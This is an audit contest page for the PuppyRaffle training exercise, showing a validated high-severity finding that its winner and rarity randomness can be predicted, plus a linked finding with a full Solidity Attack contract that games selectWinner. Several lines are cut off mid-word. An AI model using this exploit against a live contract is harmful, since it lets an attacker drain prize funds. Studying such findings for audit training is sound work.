Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak or predictable randomness in selectWinner() allows manipulation of winner selection

dharmesh

Root + Impact

Protocol Summary

PuppyRaffle is an NFT raffle protocol where users enter by paying an entrance fee, may refund their entry, and after a fixed duration a winner is selected and paid a prize while an NFT is minted to the winner. Duplicate entrants are not allowed. The owner can configure the fee recipient address.

Description

Normal behavior: After the raffle duration elapses, selectWinner() should choose a winner and NFT rarity using an unpredictable randomness source that participants cannot influence.

2) Specific issue: selectWinner() derives RNG from msg.sender, block.timestamp, and block.difficulty, which are predictable/influenceable. Attackers can time execution or use MEV to bias winner/rarity selection

@> PuppyRaffle.sol:L128-L130 (winner RNG entropy + modulo)

128: uint256 winnerIndex =

@>129: uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % play@>130: address winner = players[winnerIndex];

@> PuppyRaffle.sol:L138-L139 (rarity RNG also predictable)

@>139: uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

Risk Classification

Likelihood:

Reason 1 Entropy is attacker/validator-influenceable (L129), so the output is not sufficiently unpredictable.
Reason 2 The draw happens in a single transaction, enabling timing/ordering manipulation at execution

Impact:

Impact 1 When this will occur: During the selectWinner() draw transaction at the end of a raffle round.
Impact 2 Fairness breaks: attackers gain outsized probability of winning and can influence rarity selection
Impact 3 Prize/NFT distribution integrity is compromised, potentially leading to user losses and trust damage

Proof of Concept

1. Goal: Bias the winner/rarity by exploiting predictable on-chain entropy.

2. Relevant lines:

@> PuppyRaffle.sol:L129 uses msg.sender + block.timestamp + block.difficulty as entropy.

@> PuppyRaffle.sol:L130 selects the winner directly from players[winnerIndex].

PoC (MEV timing / caller influence):

1) Monitor the players[] array off-chain.

2) For candidate blocks, simulate the expression at L129 and compute winnerIndex = hash % players.len3) Broadcast selectWinner() only when the simulation indicates an attacker-controlled entry is select4) Use private transaction submission / high priority fee to increase inclusion reliability.

Why this works:

- msg.sender is chosen by the caller.

- block.timestamp and block.difficulty are not unpredictable randomness sources for adversaries/vali

Recommended Mitigation

• Use Chainlink VRF (preferred) or commit–reveal randomness.

• Do not derive randomness from block.timestamp, block.difficulty, or msg.sender.

• Lock raffle state (entries/refunds) before randomness finalization so the candidate set cannot be modified.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 12 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!